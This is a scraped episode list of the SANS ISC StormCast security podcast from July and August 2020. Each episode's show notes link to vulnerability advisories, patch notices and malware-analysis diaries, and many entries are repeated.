To the Brim at the Gates of Mordor https://isc.sans.edu/forums/diary/To+the+Brim+at+the+Gates+of+Mordor+Pt+1/26456/ Large Group of Malicious Tor Exit Nodes https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552603345 Intel Updates https://www.intel.com/content/www/us/en/security-center/default.html SANS Data Incident https://www.sans.org/dataincident2020
8/13/20207 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, August 13th 2020

To the Brim at the Gates of Mordor https://isc.sans.edu/forums/diary/To+the+Brim+at+the+Gates+of+Mordor+Pt+1/26456/ Large Group of Malicious Tor Exit Nodes https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552603345 Intel Updates https://www.intel.com/content/www/us/en/security-center/default.html SANS Data Incident https://www.sans.org/dataincident2020
8/13/20207 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, August 12th 2020

vBulletin 0-Day Exploit https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+August+2020+Patch+Tuesday/26452/ Adobe Patches https://helpx.adobe.com/security.html Citrix End Point Management Updates https://www.citrix.com/blogs/2020/08/11/citrix-provides-security-update-on-citrix-endpoint-management/
8/12/20205 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, August 12th 2020

vBulletin 0-Day Exploit https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+August+2020+Patch+Tuesday/26452/ Adobe Patches https://helpx.adobe.com/security.html Citrix End Point Management Updates https://www.citrix.com/blogs/2020/08/11/citrix-provides-security-update-on-citrix-endpoint-management/
8/12/20205 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, August 11th 2020

Small Challenge: A Simple Word Maldoc (Solution) https://isc.sans.edu/forums/diary/Small+Challenge+A+Simple+Word+Maldoc+Part+2/26444/ Scoping Web Application Pentests https://isc.sans.edu/forums/diary/Scoping+web+application+and+web+service+penetration+tests/26448/ Problems With Chrome Extensions https://adguard.com/en/blog/fake-ad-blockers-part-3.html PDF Test Suite https://github.com/RUB-NDS/PDF101 https://raw.githubusercontent.com/RUB-NDS/PDF101/master/eval.png Teamviewer Update https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/m-p/99129
8/11/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, August 11th 2020

Small Challenge: A Simple Word Maldoc (Solution) https://isc.sans.edu/forums/diary/Small+Challenge+A+Simple+Word+Maldoc+Part+2/26444/ Scoping Web Application Pentests https://isc.sans.edu/forums/diary/Scoping+web+application+and+web+service+penetration+tests/26448/ Problems With Chrome Extensions https://adguard.com/en/blog/fake-ad-blockers-part-3.html PDF Test Suite https://github.com/RUB-NDS/PDF101 https://raw.githubusercontent.com/RUB-NDS/PDF101/master/eval.png Teamviewer Update https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/m-p/99129
8/11/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, August 10th 2020

Scanning Activity Against WIFICAM Using Netcat https://isc.sans.edu/forums/diary/Scanning+Activity+Include+Netcat+Listener/26442/ Qualcom Snapdragon Vulnerabilities https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/ China Blocking TLS 1.3 and ESNI https://gfw.report/blog/gfw_esni_blocking/en/
8/10/20207 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, August 10th 2020

Scanning Activity Against WIFICAM Using Netcat https://isc.sans.edu/forums/diary/Scanning+Activity+Include+Netcat+Listener/26442/ Qualcom Snapdragon Vulnerabilities https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/ China Blocking TLS 1.3 and ESNI https://gfw.report/blog/gfw_esni_blocking/en/
8/10/20207 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, August 7th 2020

FTCode Ransomware Resurfaces https://isc.sans.edu/forums/diary/A+Fork+of+the+FTCode+Powershell+Ransomware/26434/ Microsoft Anti-Malware Flaging Host File Manipulation https://www.bleepingcomputer.com/news/microsoft/windows-10-hosts-file-blocking-telemetry-is-now-flagged-as-a-risk/ Reviving older printer vulnerablity https://www.blackhat.com/us-20/briefings/schedule/#a-decade-after-stuxnets-printer-vulnerability-printing-is-still-the-stairway-to-heaven-19685
8/7/20205 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, August 7th 2020

FTCode Ransomware Resurfaces https://isc.sans.edu/forums/diary/A+Fork+of+the+FTCode+Powershell+Ransomware/26434/ Microsoft Anti-Malware Flaging Host File Manipulation https://www.bleepingcomputer.com/news/microsoft/windows-10-hosts-file-blocking-telemetry-is-now-flagged-as-a-risk/ Reviving older printer vulnerablity https://www.blackhat.com/us-20/briefings/schedule/#a-decade-after-stuxnets-printer-vulnerability-printing-is-still-the-stairway-to-heaven-19685
8/7/20205 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, August 6th 2020

Malware Analysis Quiz https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Whats+the+Malware+From+This+Infection/26430/ Exploiting CVE-2020-9854 on MacOS https://objective-see.com/blog/blog_0x4D.html iOS OAuth2 Vulnerablity https://www.computest.nl/en/knowledge-platform/blog/vulnerability-new-touchid-feature-iCloud-accounts-at-risk-breached/ Limiting Location Data Exposure https://media.defense.gov/2020/Aug/04/2002469874/-1/-1/0/CSI_LIMITING_LOCATION_DATA_EXPOSURE_FINAL.PDF
8/6/20206 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, August 6th 2020

Malware Analysis Quiz https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Whats+the+Malware+From+This+Infection/26430/ Exploiting CVE-2020-9854 on MacOS https://objective-see.com/blog/blog_0x4D.html iOS OAuth2 Vulnerablity https://www.computest.nl/en/knowledge-platform/blog/vulnerability-new-touchid-feature-iCloud-accounts-at-risk-breached/ Limiting Location Data Exposure https://media.defense.gov/2020/Aug/04/2002469874/-1/-1/0/CSI_LIMITING_LOCATION_DATA_EXPOSURE_FINAL.PDF
8/6/20206 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, August 5th 2020

A Reminder to Patch CVE-2020-3452. Active Exploitation Seen https://isc.sans.edu/forums/diary/Reminder+Patch+Cisco+ASA+FTD+Devices+CVE20203452+Exploitation+Continues/26426/ Internet Choke Points: Concentration of Authoritative Name Servers https://isc.sans.edu/forums/diary/Internet+Choke+Points+Concentration+of+Authoritative+Name+Servers/26428/ August Android Patches Released https://source.android.com/security/bulletin/2020-08-01 Possible New iOS Jailbreak Affecting Secure Enclave https://twitter.com/SparkZheng/status/1286599007834271744
8/5/20206 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, August 5th 2020

A Reminder to Patch CVE-2020-3452. Active Exploitation Seen https://isc.sans.edu/forums/diary/Reminder+Patch+Cisco+ASA+FTD+Devices+CVE20203452+Exploitation+Continues/26426/ Internet Choke Points: Concentration of Authoritative Name Servers https://isc.sans.edu/forums/diary/Internet+Choke+Points+Concentration+of+Authoritative+Name+Servers/26428/ August Android Patches Released https://source.android.com/security/bulletin/2020-08-01 Possible New iOS Jailbreak Affecting Secure Enclave https://twitter.com/SparkZheng/status/1286599007834271744
8/5/20206 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, August 4th 2020

VBA Macro With Multiple Command and Control Channels https://isc.sans.edu/forums/diary/Powershell+Bot+with+Multiple+C2+Protocols/26420/ Boothole Patch Causes Unbootable Systems https://access.redhat.com/solutions/5272311 https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass#Recovery Disabling MacOS TCC https://objective-see.com/blog/blog_0x4C.html CISA Publishes Details about Chinese Malware https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity
8/4/20205 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, August 4th 2020

VBA Macro With Multiple Command and Control Channels https://isc.sans.edu/forums/diary/Powershell+Bot+with+Multiple+C2+Protocols/26420/ Boothole Patch Causes Unbootable Systems https://access.redhat.com/solutions/5272311 https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass#Recovery Disabling MacOS TCC https://objective-see.com/blog/blog_0x4C.html CISA Publishes Details about Chinese Malware https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity
8/4/20205 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, August 3rd 2020

Pages Hit By Bad Bots https://isc.sans.edu/forums/diary/What+pages+do+bad+bots+look+for/26414/ KeePassRPC Vulnerablity https://forum.kee.pm/t/a-critical-security-update-for-keepassrpc-is-available/3040 QNAP Updates Malware Remover https://www.bleepingcomputer.com/news/security/qnap-urges-users-to-update-malware-remover-after-qsnatch-alert/ Android Phone Updates https://www.theregister.com/2020/07/31/nearly_a_third_of_secondhand/
8/3/20205 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, August 3rd 2020

Pages Hit By Bad Bots https://isc.sans.edu/forums/diary/What+pages+do+bad+bots+look+for/26414/ KeePassRPC Vulnerablity https://forum.kee.pm/t/a-critical-security-update-for-keepassrpc-is-available/3040 QNAP Updates Malware Remover https://www.bleepingcomputer.com/news/security/qnap-urges-users-to-update-malware-remover-after-qsnatch-alert/ Android Phone Updates https://www.theregister.com/2020/07/31/nearly_a_third_of_secondhand/
8/3/20205 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, July 31st 2020

Python Developers: Prepare! https://isc.sans.edu/forums/diary/Python+Developers+Prepare/26408/ Office 365 Phishing Hiding in Google Ads https://cofense.com/threat-actors-bypass-gateways-google-ad-redirects/ Zoom Brute Forcing Vulnerability https://www.tomanthony.co.uk/blog/zoom-security-exploit-crack-private-meeting-passwords/ Netgear Vulnerabilities https://www.kb.cert.org/vuls/id/576779 https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders OPNSense Update https://opnsense.org/opnsense-20-7/ Microsoft Retiring SHA1 https://techcommunity.microsoft.com/t5/windows-it-pro-blog/sha-1-windows-content-to-be-retired-august-3-2020/ba-p/1544373
7/31/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, July 31st 2020

Python Developers: Prepare! https://isc.sans.edu/forums/diary/Python+Developers+Prepare/26408/ Office 365 Phishing Hiding in Google Ads https://cofense.com/threat-actors-bypass-gateways-google-ad-redirects/ Zoom Brute Forcing Vulnerability https://www.tomanthony.co.uk/blog/zoom-security-exploit-crack-private-meeting-passwords/ Netgear Vulnerabilities https://www.kb.cert.org/vuls/id/576779 https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders OPNSense Update https://opnsense.org/opnsense-20-7/ Microsoft Retiring SHA1 https://techcommunity.microsoft.com/t5/windows-it-pro-blog/sha-1-windows-content-to-be-retired-august-3-2020/ba-p/1544373
7/31/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, July 30th 2020

Consumer VPNs: You May Be Fine Without It https://isc.sans.edu/forums/diary/Consumer+VPNs+You+May+Be+Fine+Without/26404/ Tails Update https://tails.boum.org/news/version_4.9/index.en.html Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2020-30/ Chrome Update https://chromereleases.googleblog.com/2020/07/stable-channel-update-for-desktop_27.html GRUB2 Vulnerability https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/ Facial Recognition With Masks https://nvlpubs.nist.gov/nistpubs/ir/2020/NIST.IR.8311.pdf
7/30/20206 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, July 30th 2020

Consumer VPNs: You May Be Fine Without It https://isc.sans.edu/forums/diary/Consumer+VPNs+You+May+Be+Fine+Without/26404/ Tails Update https://tails.boum.org/news/version_4.9/index.en.html Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2020-30/ Chrome Update https://chromereleases.googleblog.com/2020/07/stable-channel-update-for-desktop_27.html GRUB2 Vulnerability https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/ Facial Recognition With Masks https://nvlpubs.nist.gov/nistpubs/ir/2020/NIST.IR.8311.pdf
7/30/20206 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, July 29th 2020

New Datafeeds https://isc.sans.edu/forums/diary/All+I+want+this+Tuesday+More+Data/26400/ Emotet Stealing Email Attachments https://twitter.com/CofenseLabs/status/1288167724594671618 Magento Update https://helpx.adobe.com/security/products/magento/apsb20-47.html Explosed Docker Servers Infected with More Malware https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/
7/29/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, July 29th 2020

New Datafeeds https://isc.sans.edu/forums/diary/All+I+want+this+Tuesday+More+Data/26400/ Emotet Stealing Email Attachments https://twitter.com/CofenseLabs/status/1288167724594671618 Magento Update https://helpx.adobe.com/security/products/magento/apsb20-47.html Explosed Docker Servers Infected with More Malware https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/
7/29/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, July 28th 2020

In Memory of Donald Smith https://isc.sans.edu/forums/diary/In+Memory+of+Donald+Smith/26396/ Analyzing Metasploit ASP .Net Payloads https://isc.sans.edu/forums/diary/Analyzing+Metasploit+ASP+NET+Payloads/26392/ Emotet Payloads Replaces with GIFs https://twitter.com/GossiTheDog/status/1286271503005290497 QNAP Devices Attacked https://us-cert.cisa.gov/ncas/alerts/aa20-209a
7/28/20204 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, July 28th 2020

In Memory of Donald Smith https://isc.sans.edu/forums/diary/In+Memory+of+Donald+Smith/26396/ Analyzing Metasploit ASP .Net Payloads https://isc.sans.edu/forums/diary/Analyzing+Metasploit+ASP+NET+Payloads/26392/ Emotet Payloads Replaces with GIFs https://twitter.com/GossiTheDog/status/1286271503005290497 QNAP Devices Attacked https://us-cert.cisa.gov/ncas/alerts/aa20-209a
7/28/20204 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, July 27th 2020

Compromized Desktop Applications By Web Technologies https://isc.sans.edu/forums/diary/Compromized+Desktop+Applications+by+Web+Technologies/26384/ Cracking Maldoc VBA Project Passwords https://isc.sans.edu/forums/diary/Cracking+Maldoc+VBA+Project+Passwords/26390/ Cisco Patching Treck IP Stack Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC Ubiquity Devices Breack Due to Malformed Feed https://community.ui.com/questions/Threat-Management-rules-silently-disabled-for-users-as-of-July-17-2020/35221bd2-843d-41a3-a957-33f57d9a8468
7/27/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, July 27th 2020

Compromized Desktop Applications By Web Technologies https://isc.sans.edu/forums/diary/Compromized+Desktop+Applications+by+Web+Technologies/26384/ Cracking Maldoc VBA Project Passwords https://isc.sans.edu/forums/diary/Cracking+Maldoc+VBA+Project+Passwords/26390/ Cisco Patching Treck IP Stack Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC Ubiquity Devices Breack Due to Malformed Feed https://community.ui.com/questions/Threat-Management-rules-silently-disabled-for-users-as-of-July-17-2020/35221bd2-843d-41a3-a957-33f57d9a8468
7/27/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, July 24th 2020

Simple Blocklisting with MISP and pfSense https://isc.sans.edu/forums/diary/Simple+Blocklisting+with+MISP+pfSense/26380/ ISC Intel Feed (Beta. DO NOT USE AS BLOCKLIST) https://isc.sans.edu/api/intelfeed?json (also see isc.sans.edu/api ) ASUS RT-AC1900P Router Vulnerability https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440 DLink Leaks Firmware Encryption Key https://nstarke.github.io/0036-decrypting-dlink-proprietary-firmware-images.html Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
7/24/20206 minutes
Episode Artwork

ISC StormCast for Friday, July 24th 2020

Simple Blocklisting with MISP and pfSense https://isc.sans.edu/forums/diary/Simple+Blocklisting+with+MISP+pfSense/26380/ ISC Intel Feed (Beta. DO NOT USE AS BLOCKLIST) https://isc.sans.edu/api/intelfeed?json (also see isc.sans.edu/api ) ASUS RT-AC1900P Router Vulnerability https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440 DLink Leaks Firmware Encryption Key https://nstarke.github.io/0036-decrypting-dlink-proprietary-firmware-images.html Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
7/24/20206 minutes
Episode Artwork

ISC StormCast for Thursday, July 23rd 2020

A Few IoCs Releated to the F5 Vulnerablity CVE-2020-5092 https://isc.sans.edu/forums/diary/A+few+IoCs+related+to+CVE20205092/26378/ PDF Signature Weaknesses https://pdf-insecurity.org/ Sharepoint Vulnerabliity PoC CVE-2020-1147 https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html Twilio Compromise https://www.theregister.com/2020/07/21/twilio_sdk_code_injection/
7/23/20206 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, July 23rd 2020

A Few IoCs Releated to the F5 Vulnerablity CVE-2020-5092 https://isc.sans.edu/forums/diary/A+few+IoCs+related+to+CVE20205092/26378/ PDF Signature Weaknesses https://pdf-insecurity.org/ Sharepoint Vulnerabliity PoC CVE-2020-1147 https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html Twilio Compromise https://www.theregister.com/2020/07/21/twilio_sdk_code_injection/
7/23/20206 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, July 22nd 2020

Comparing Covid19 Remote Services in Different Countries https://isc.sans.edu/forums/diary/Couple+of+interesting+Covid19+related+stats/26374/ Adobe Patches Photoshop https://helpx.adobe.com/security/products/bridge/apsb20-44.html https://helpx.adobe.com/security/products/photoshop/apsb20-45.html Citrix Workspace App Vulnerability https://www.pentestpartners.com/security-blog/raining-system-shells-with-citrix-workspace-app/ Microsoft Publishes Sysinternals Procmon for Linux https://github.com/microsoft/ProcMon-for-Linux
7/22/20204 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, July 22nd 2020

Comparing Covid19 Remote Services in Different Countries https://isc.sans.edu/forums/diary/Couple+of+interesting+Covid19+related+stats/26374/ Adobe Patches Photoshop https://helpx.adobe.com/security/products/bridge/apsb20-44.html https://helpx.adobe.com/security/products/photoshop/apsb20-45.html Citrix Workspace App Vulnerability https://www.pentestpartners.com/security-blog/raining-system-shells-with-citrix-workspace-app/ Microsoft Publishes Sysinternals Procmon for Linux https://github.com/microsoft/ProcMon-for-Linux
7/22/20204 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, July 21st 2020

Sextortion Follow the Money Wrapup https://isc.sans.edu/forums/diary/Sextortion+Update+The+Final+Final+Chapter/26334/ "BadPower" USB-C Charger Firmware Weakness (link in chinese) https://xlab.tencent.com/cn/2020/07/16/badpower/ Zoom Phishing https://blog.checkpoint.com/2020/07/16/fixing-the-zoom-vanity-clause-check-point-and-zoom-collaborate-to-fix-vanity-url-issue/ Microsoft Office TLS 1.x Phaseout https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-tls-1.2-in-office-365?view=o365-worldwide
7/21/20206 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, July 21st 2020

Sextortion Follow the Money Wrapup https://isc.sans.edu/forums/diary/Sextortion+Update+The+Final+Final+Chapter/26334/ "BadPower" USB-C Charger Firmware Weakness (link in chinese) https://xlab.tencent.com/cn/2020/07/16/badpower/ Zoom Phishing https://blog.checkpoint.com/2020/07/16/fixing-the-zoom-vanity-clause-check-point-and-zoom-collaborate-to-fix-vanity-url-issue/ Microsoft Office TLS 1.x Phaseout https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-tls-1.2-in-office-365?view=o365-worldwide
7/21/20206 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, July 20th 2020

#SigRed Update https://isc.sans.edu/forums/diary/Hunting+for+SigRed+Exploitation/26362/ Cloudflare Outage https://blog.cloudflare.com/cloudflare-outage-on-july-17-2020/ Exploitation of ZeroShell Routers https://isc.sans.edu/forums/diary/Scanning+Activity+for+ZeroShell+Unauthenticated+Access/26368/ Zone.Identifier: A Coupe of Observations https://isc.sans.edu/forums/diary/ZoneIdentifier+A+Coupe+Of+Observations/26366/ Forgotten tcpdump Options https://showmethepackets.com/index.php/2020/07/18/a-few-forgotten-tcpdump-options/
7/20/20205 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, July 20th 2020

#SigRed Update https://isc.sans.edu/forums/diary/Hunting+for+SigRed+Exploitation/26362/ Cloudflare Outage https://blog.cloudflare.com/cloudflare-outage-on-july-17-2020/ Exploitation of ZeroShell Routers https://isc.sans.edu/forums/diary/Scanning+Activity+for+ZeroShell+Unauthenticated+Access/26368/ Zone.Identifier: A Coupe of Observations https://isc.sans.edu/forums/diary/ZoneIdentifier+A+Coupe+Of+Observations/26366/ Forgotten tcpdump Options https://showmethepackets.com/index.php/2020/07/18/a-few-forgotten-tcpdump-options/
7/20/20205 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, July 17th 2020

Twitter Compromise https://twitter.com/TwitterSupport/status/1283591846464233474?s=20 SIGRed PoC hxxps://github.com/maxpl0it/CVE-2020-1350-DoS Apple Updates https://support.apple.com/en-us/HT201222 SAP PoC Exploit Code Published https://github.com/chipik/SAP_RECON https://us-cert.cisa.gov/ncas/alerts/aa20-195a SANS.edu Student: Aaron Elyard: KITT https://www.sans.org/reading-room/whitepapers/OpenSource/improving-analyst-efficiency-office365-business-email-compromise-investigation-scenarios-implementation-open-source-tools-39655 KITT: https://github.com/intrepidtechie/KITT-O365-Tool
7/17/202013 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, July 17th 2020

Twitter Compromise https://twitter.com/TwitterSupport/status/1283591846464233474?s=20 SIGRed PoC hxxps://github.com/maxpl0it/CVE-2020-1350-DoS Apple Updates https://support.apple.com/en-us/HT201222 SAP PoC Exploit Code Published https://github.com/chipik/SAP_RECON https://us-cert.cisa.gov/ncas/alerts/aa20-195a SANS.edu Student: Aaron Elyard: KITT https://www.sans.org/reading-room/whitepapers/OpenSource/improving-analyst-efficiency-office365-business-email-compromise-investigation-scenarios-implementation-open-source-tools-39655 KITT: https://github.com/intrepidtechie/KITT-O365-Tool
7/17/202013 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, July 16th 2020

MSFT DNS Server Vulnerability https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/ https://www.sans.org/webcasts/about-windows-dns-vulnerability-cve-2020-1350-116120 Outlook Crashes After Patch Tuesday Updates https://www.reddit.com/r/sysadmin/comments/hrq0mn/outlook_immediately_crashing_on_open_after/fy5nnx2/ Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujul2020.html Cisco Backdoors https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities
7/16/20205 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, July 16th 2020

MSFT DNS Server Vulnerability https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/ https://www.sans.org/webcasts/about-windows-dns-vulnerability-cve-2020-1350-116120 Outlook Crashes After Patch Tuesday Updates https://www.reddit.com/r/sysadmin/comments/hrq0mn/outlook_immediately_crashing_on_open_after/fy5nnx2/ Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujul2020.html Cisco Backdoors https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities
7/16/20205 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, July 15th 2020

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+July+2020+Patch+Tuesday+Patch+Now/26350/ Adobe Patches https://helpx.adobe.com/security.html
7/15/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, July 15th 2020

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+July+2020+Patch+Tuesday+Patch+Now/26350/ Adobe Patches https://helpx.adobe.com/security.html
7/15/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, July 14th 2020

Purged VBA Code https://isc.sans.edu/forums/diary/Maldoc+VBA+Purging+Example/26342/ Password protected VBA Code https://isc.sans.edu/forums/diary/VBA+Project+Passwords/26346/ MacOS mount_apfs TCC Bypass https://theevilbit.github.io/posts/cve_2020_9771/
7/14/20206 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, July 14th 2020

Purged VBA Code https://isc.sans.edu/forums/diary/Maldoc+VBA+Purging+Example/26342/ Password protected VBA Code https://isc.sans.edu/forums/diary/VBA+Project+Passwords/26346/ MacOS mount_apfs TCC Bypass https://theevilbit.github.io/posts/cve_2020_9771/
7/14/20206 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, July 13th 2020

Excel Spreadsheet Macro Kicks Off Formbook Infection https://isc.sans.edu/forums/diary/Excel+spreasheet+macro+kicks+off+Formbook+infection/26332/ Zoom Update Fixing Zoom on Windows 7 Vulnerability https://support.zoom.us/hc/en-us/articles/360046081271-New-updates-for-July-10-2020 DigiCert Replaces 50,000 EV Certificates https://knowledge.digicert.com/alerts/DigiCert-ICA-Replacement Microsoft Warns of OAUTH consent Phishing https://www.microsoft.com/security/blog/2020/07/08/protecting-remote-workforce-application-attacks-consent-phishing/
7/13/20206 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, July 13th 2020

Excel Spreadsheet Macro Kicks Off Formbook Infection https://isc.sans.edu/forums/diary/Excel+spreasheet+macro+kicks+off+Formbook+infection/26332/ Zoom Update Fixing Zoom on Windows 7 Vulnerability https://support.zoom.us/hc/en-us/articles/360046081271-New-updates-for-July-10-2020 DigiCert Replaces 50,000 EV Certificates https://knowledge.digicert.com/alerts/DigiCert-ICA-Replacement Microsoft Warns of OAUTH consent Phishing https://www.microsoft.com/security/blog/2020/07/08/protecting-remote-workforce-application-attacks-consent-phishing/
7/13/20206 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, July 10th 2020

Citrix Scanning https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/ https://www.youtube.com/watch?time_continue=6&v=1_D4_9BKHSc&feature=emb_logo Juniper Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES Google Releases Tsunami Security Scanner https://github.com/google/tsunami-security-scanner SANS.edu Student Billy Wilson: Security Supercomputers with BPF Probes https://www.sans.org/reading-room/whitepapers/detection/securing-soft-underbelly-supercomputer-bpf-probes-39635#__utma=56421037.1361558334.1422039453.1445264258.1445266863.510&__utmb=56421037.17.9.1445268558432&__utmc=56421037&__utmx=-&__utmz=56421037.1444729543.493.57.utmcsr=admin.sans.org|utmccn=%28referral%29|utmcmd=referral|utmcct=/account/madmin/account_manage
7/10/202014 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, July 10th 2020

Citrix Scanning https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/ https://www.youtube.com/watch?time_continue=6&v=1_D4_9BKHSc&feature=emb_logo Juniper Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES Google Releases Tsunami Security Scanner https://github.com/google/tsunami-security-scanner SANS.edu Student Billy Wilson: Security Supercomputers with BPF Probes https://www.sans.org/reading-room/whitepapers/detection/securing-soft-underbelly-supercomputer-bpf-probes-39635#__utma=56421037.1361558334.1422039453.1445264258.1445266863.510&__utmb=56421037.17.9.1445268558432&__utmc=56421037&__utmx=-&__utmz=56421037.1444729543.493.57.utmcsr=admin.sans.org|utmccn=%28referral%29|utmcmd=referral|utmcct=/account/madmin/account_manage
7/10/202014 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, July 9th 2020

Obfuscated Malware https://isc.sans.edu/forums/diary/If+You+Want+Something+Done+Right+You+Have+To+Do+It+Yourself+Malware+Too/26320/ PaloAlto Networks PAN-OS CVE-2020-2034 https://security.paloaltonetworks.com/CVE-2020-2034 Citrix Vulnerability Details (CVE-2020-8194) https://dmaasland.github.io/posts/citrix.html Mozilla Suspending Send Service https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
7/9/20206 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, July 9th 2020

